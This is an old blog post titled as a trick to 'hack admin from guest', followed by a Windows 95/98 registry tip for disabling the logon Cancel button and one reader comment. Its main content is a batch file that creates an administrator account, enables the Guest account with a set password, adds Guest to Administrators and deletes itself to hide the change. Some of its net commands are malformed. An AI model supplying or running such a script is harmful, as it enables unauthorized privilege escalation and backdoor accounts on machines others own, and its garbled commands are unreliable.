Much Simpler trick to Hack admin from GuestHaCk
"GUEST" with Admin privilegesCopy this to notepad
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Save the file as "Guest2admin.bat"then u can double click the file to execute or run in the cmd.
Restricting Logon Access
If you work in a multiuser computing environment, and you have full (administrator level) access to your computer, you might want to restrict unauthorized access to your "sensitive" files under Windows 95/98.One way is to disable the Cancel button in the Logon dialog box.Just run Regedit and go to:HKEY_LOCAL_MACHINE/Network/LogonCreate the "Logon" subkey if it is not present on your machine: highlight the Network key -> right-click in the left hand Regedit pane -> select New -> Key -> name it "Logon" (no quotes) -> press Enter. Then add/modify a DWORD value and call it "MustBeValidated" (don't type the quotes). Double-click it, check the Decimal box and type 1 for value.Now click the Start button -> Shut Down (Log off UserName) -> Log on as a different user, and you'll notice that the Logon Cancel button has been disabled.
Wednesday, September 3, 2008
Subscribe to:
Post Comments (Atom)

1 comment:
hai,
its very useful tips for me,
thanks a lot
Post a Comment